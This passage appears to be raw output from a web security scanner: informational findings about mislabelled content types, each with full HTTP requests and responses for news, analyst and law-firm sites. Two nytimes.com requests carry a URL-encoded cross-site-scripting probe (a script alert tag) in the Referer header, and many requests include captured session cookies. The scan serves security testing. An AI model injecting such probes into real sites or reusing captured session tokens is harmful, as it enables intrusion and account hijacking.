Set-Cookie: .ASPXANONYMOUS=ak3aKqwvzQEkAAAAMTRmYzcwNTctMjkxNy00NTIyLWI3MjYtZjUyY2NjM2E1NGZj0; expires=Fri, 11-May-2012 19:27:56 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=e508d7f7-4d7c-4017-9137-bc530b45f2fc; domain=centrifugesystems.app101.hubspot.com; expires=Wed, 12-May-2021 05:00:00 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Set-Cookie: HUBSPOT140=2064716972.0.0000; path=/
Content-Length: 498


var hsUse20Servers = true;
var hsDayEndsIn = 30723;
var hsWeekEndsIn = 289923;
var hsMonthEndsIn = 1672323;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-12 15:27
...[SNIP]...
36.2. http://gigablast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://gigablast.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: gigablast.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 2806
Content-Type: text/html
Connection: Close
Server: Gigablast/1.0
Date: Thu, 12 May 2011 15:14:07 GMT
Last-Modified: Thu, 02 Oct 2008 01:41:24 GMT

..............h...&...........h.......(....... ................................=...<...?...>...?...>...A...?...?...?...@...@...A...>...A...@...?...?...A...@...?...@...B...?...@...A...A...A...A...A...>
...[SNIP]...
36.3. http://image.exct.net/3aa0b01a-9.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://image.exct.net
Path:   /3aa0b01a-9.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /3aa0b01a-9.jpg HTTP/1.1
Host: image.exct.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rothmanconsulting.com/

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "7b89f385461b05c2554d3e633687101a:1214224825"
Last-Modified: Mon, 23 Jun 2008 12:40:25 GMT
Accept-Ranges: bytes
Content-Length: 33536
Content-Type: image/jpeg
Date: Thu, 12 May 2011 18:08:52 GMT
Connection: close

......JFIF.....d.d......Ducky.......?......Adobe.d.........................
....
.        
       ......................................
......................................................................
...[SNIP]...
36.4. http://image.exct.net/66630590-4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://image.exct.net
Path:   /66630590-4.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /66630590-4.jpg HTTP/1.1
Host: image.exct.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rothmanconsulting.com/

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "67472032aaa4680b2f78512bdaf6bb9b:1214225486"
Last-Modified: Mon, 23 Jun 2008 12:51:26 GMT
Accept-Ranges: bytes
Content-Length: 3840
Content-Type: image/jpeg
Date: Thu, 12 May 2011 18:08:53 GMT
Connection: close

......JFIF.....G.G.....C...........    ...    .......

.

........................... ...C.............. ......r.R.................................
...[SNIP]...
36.5. http://image.exct.net/aec5805b-4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://image.exct.net
Path:   /aec5805b-4.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /aec5805b-4.jpg HTTP/1.1
Host: image.exct.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rothmanconsulting.com/

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "329bea1b62b94be451d61ec6e3e817b4:1214226700"
Last-Modified: Mon, 23 Jun 2008 13:11:40 GMT
Accept-Ranges: bytes
Content-Length: 6144
Content-Type: image/jpeg
Date: Thu, 12 May 2011 18:08:51 GMT
Connection: close

......JFIF.....d.d......Ducky.......K......Adobe.d...............................................    


   .............................................................................................]....
...[SNIP]...
36.6. http://js.nyt.com/js/app/moth/moth.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://js.nyt.com
Path:   /js/app/moth/moth.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /js/app/moth/moth.js HTTP/1.1
Host: js.nyt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 210
Content-Type: application/x-javascript
Last-Modified: Tue, 08 Mar 2011 20:37:40 GMT
ETag: "d2-4d769394"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: private, max-age=65086
Date: Thu, 12 May 2011 19:53:39 GMT
Connection: close
Content-Length: 210

NYTD.require('/js/app/lib/scriptaculous/extensions/effect_scroll.js');
NYTD.require('/js/app/lib/iscroll/3.6.min.js');
NYTD.require('/js/app/moth/mothController.js');
NYTD.require('/js/app/moth/mothLe
...[SNIP]...
36.7. http://m.perkinscoie.com/FCWSite/img/mobile/read_more.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://m.perkinscoie.com
Path:   /FCWSite/img/mobile/read_more.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /FCWSite/img/mobile/read_more.png HTTP/1.1
Host: m.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.perkinscoie.com/FCWSite/Include/mobile/main.css
Cookie: __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; __utmb=49731751; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=3814; PortletId=4736294; SiteId=3811; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=u1pig42zp4pybpu2rug2dqbl; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 1102
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 23:39:52 GMT
Accept-Ranges: bytes
ETag: "562b687e7bbecb1:8a30"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A68
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:46:26 GMT

GIF89a........CY...!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rd
...[SNIP]...
36.8. http://m.perkinscoie.com/FCWSite/img/mobile/read_more_hover.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://m.perkinscoie.com
Path:   /FCWSite/img/mobile/read_more_hover.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /FCWSite/img/mobile/read_more_hover.png HTTP/1.1
Host: m.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.perkinscoie.com/FCWSite/Include/mobile/main.css
Cookie: __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=3814; PortletId=4736294; SiteId=3811; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=u1pig42zp4pybpu2rug2dqbl; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 1102
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 23:39:52 GMT
Accept-Ranges: bytes
ETag: "b38d6a7e7bbecb1:8a30"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A68
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 17:51:50 GMT

GIF89a........\....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rd
...[SNIP]...
36.9. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.gstatic.com
Path:   /intl/en_us/mapfiles/openhand_8_8.cur

Issue detail

The response contains the following Content-type statement:The response states that it contains a BMP image. However, it actually appears to contain unrecognised content.

Request

GET /intl/en_us/mapfiles/openhand_8_8.cur HTTP/1.1
Host: maps.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.semmes.com/offices/salisbury.asp

Response

HTTP/1.1 200 OK
Content-Type: image/bmp
Last-Modified: Thu, 17 Sep 2009 03:15:42 GMT
Date: Thu, 12 May 2011 16:11:46 GMT
Expires: Thu, 12 May 2011 16:11:46 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 326
X-XSS-Protection: 1; mode=block

...... ......0.......(... ...@...............................................................................................................................?...w...g...............................
...[SNIP]...
36.10. http://pillsburylaw.app4.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pillsburylaw.app4.hubspot.com
Path:   /salog.js.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /salog.js.aspx HTTP/1.1
Host: pillsburylaw.app4.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: .ASPXANONYMOUS=StsAonAvzQEkAAAAYjYwNjBlNjMtYTcyMi00NzE0LWI1NjQtNDMyYWNlNmQ3NDBj0; hubspotutk=148ff71c-54bf-42a7-b313-024966931ee5; hsfirstvisit=http%253A%252F%252Fwww.pillsburylaw.com%252F%7chttp%253A%252F%252Fwww.google.com%252Fsearch%253Fq%253DPillsbury%252BWinthrop%252BShaw%252BPittman%2526ie%253Dutf-8%2526oe%253Dutf-8%2526aq%253Dt%2526rls%253Dorg.mozilla%253Aen-US%253Aofficial%2526client%253Dfirefox-a%7c2011-05-12%252008%253A21%253A46

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Thu, 12 May 2011 16:09:01 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Set-Cookie: HUBSPOT95=521213100.0.0000; path=/
Content-Length: 796


var hsUse20Servers = true;
var hsDayEndsIn = 42658;
var hsWeekEndsIn = 301858;
var hsMonthEndsIn = 1684258;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-12 12:09
...[SNIP]...
36.11. http://www.dmoc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dmoc.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: www.dmoc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESS97997ab7f65dbfa3475cc6e258e81de7=58296304a4b8ec99476daf96829e277a; __utma=101869332.609237140.1305202772.1305202772.1305223694.2; __utmz=101869332.1305223694.2.2.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/diserio-martin-oconnor-castiglioni-llp; has_js=1; __utmb=101869332.1.10.1305223694; __utmc=101869332

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 18:08:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 45
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.
36.12. http://www.gartner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231539240:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.1.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 02 Feb 2007 20:41:40 GMT
Content-Type: text/plain; charset=UTF-8
ETag: "pv0c52720205b096d8a409984861904360"
Expires: Tue, 10 May 2011 22:43:02 GMT
Cache-Control: public, s-maxage=3600, max-age=172800
X-PvInfo: [S11101.C10821.A158739.RA158706.G26D16.U2A265705].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:19:10 GMT
Age: 2132
Content-Length: 894

..............h.......(....... ................................h...8..l...........a..0.g..g..g..g..u...W..w..^.............................9.g..~'...........................................j..........
...[SNIP]...
36.13. http://www.gartner.com/include/webtrends.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /include/webtrends.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /include/webtrends.jsp HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 20:18:56 GMT
Set-Cookie: WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; domain=.gartner.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO8859_1
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.UD4EB7C80].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; Path=/
Content-Length: 22376

<!-- START OF Advanced SmartSource Data Collector TAG -->
<!-- Copyright (c) 1996-2006 WebTrends Inc. All rights reserved.-->
<!-- $DateTime: 2006/03/09 14:15:22 $ -->
<!-- 2006/10/30: Modified by
...[SNIP]...
36.14. http://www.gartner.com/technology/include/metricsHelper.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /technology/include/metricsHelper.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /technology/include/metricsHelper.jsp HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:18:56 GMT
Content-Length: 283
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Type: text/html; charset=ISO-8859-1
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.U8B62F8FE].[OT/html.OG/pages]
Vary: Accept-Encoding


var metricsUserClass = "Visitor";
var metricsLoginTxt = "";
var metricsEmailTxt = "";
var metricsCity = "";
var metricsState
...[SNIP]...
36.15. https://www.gartner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.gartner.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231574822:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.2.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LoginWLSessionID=dj22NMQfh16FmhxVgWyctlxb73Tc6GtpjZsgcTX6L9DvmxX5cNHZ!-1907662523

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 02 Feb 2007 20:41:40 GMT
Content-Type: text/plain; charset=UTF-8
ETag: "pv0c52720205b096d8a409984861904360"
Expires: Tue, 10 May 2011 22:43:02 GMT
Cache-Control: public, s-maxage=3600, max-age=172800
X-PvInfo: [S11101.C10821.A158739.RA158706.G26D16.U2A265705].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:19:51 GMT
Age: 2173
Content-Length: 894

..............h.......(....... ................................h...8..l...........a..0.g..g..g..g..u...W..w..^.............................9.g..~'...........................................j..........
...[SNIP]...
36.16. http://www.glaala.org/clubportal/images/clubimages/194/vendors/wolfe_busby_logo.tiff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.glaala.org
Path:   /clubportal/images/clubimages/194/vendors/wolfe_busby_logo.tiff

Issue detail

The response contains the following Content-type statement:The response states that it contains a TIFF image. However, it actually appears to contain unrecognised content.

Request

GET /clubportal/images/clubimages/194/vendors/wolfe_busby_logo.tiff HTTP/1.1
Host: www.glaala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.glaala.org/clubportal/glaala/index.cfm
Cookie: CFID=26522752; CFTOKEN=f93221608fca2a23-E565E7CC-C06D-5EE7-FF3571846EE026C4; CFGLOBALS=urltoken%3DCFID%23%3D26522752%26CFTOKEN%23%3Df93221608fca2a23%2DE565E7CC%2DC06D%2D5EE7%2DFF3571846EE026C4%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A11%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A11%27%7D%23hitcount%3D2%23cftoken%3Df93221608fca2a23%2DE565E7CC%2DC06D%2D5EE7%2DFF3571846EE026C4%23cfid%3D26522752%23

Response

HTTP/1.1 200 OK
Content-Length: 104184
Content-Type: image/tiff
Content-Location: http://www.glaala.org/clubportal/images/clubimages/194/vendors/wolfe_busby_logo.tiff
Last-Modified: Thu, 24 Feb 2011 23:06:15 GMT
Accept-Ranges: bytes
ETag: "30b4c46f77d4cb1:869"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 18:09:35 GMT

MM.*....................................................................................................................................................................................................
...[SNIP]...
36.17. http://www.moritthock.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.moritthock.com
Path:   /index.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /index.php?css={stylesheet=global/nav HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/
Cookie: exp_last_visit=1305221465; exp_last_activity=1305234570; __utma=175020734.1039693598.1305202900.1305202900.1305202900.1; __utmz=175020734.1305202900.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:33 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Content-Length: 11
Content-Type: text/html

Invalid URI
36.18. http://www.nytimes.com/adx/bin/adx_remote.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nytimes.com
Path:   /adx/bin/adx_remote.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adx/bin/adx_remote.html?type=fastscript&page=www.nytimes.com/yr/mo/day/&posall=Frame6A&query=qstring&keywords=? HTTP/1.1
Host: www.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: RMID=de922e2c777a4dcc117c807b; nyt-m=63287DEF2409E7B7D9BE087FA2837C71&e=i.1306900800&t=i.20&v=i.1&l=l.15.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.1.0.0.0&pr=l.4.21.0.0.0&vp=i.0&gf=l.20.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199757505:ss=1305199567634; _chartbeat2=8c1mweurlbk22c68; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 19:54:11 GMT
Content-type: text/html
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 621


var adxads = new Array(1);

adxads[0] = "<!-- ADXINFO classification=\"banner\" campaign=\"foxsearch2011_emailtools_1629901h_nyt5\"--><a href=\"http://www.nytimes.com/adx/bin/adx_click.html?type=goto
...[SNIP]...
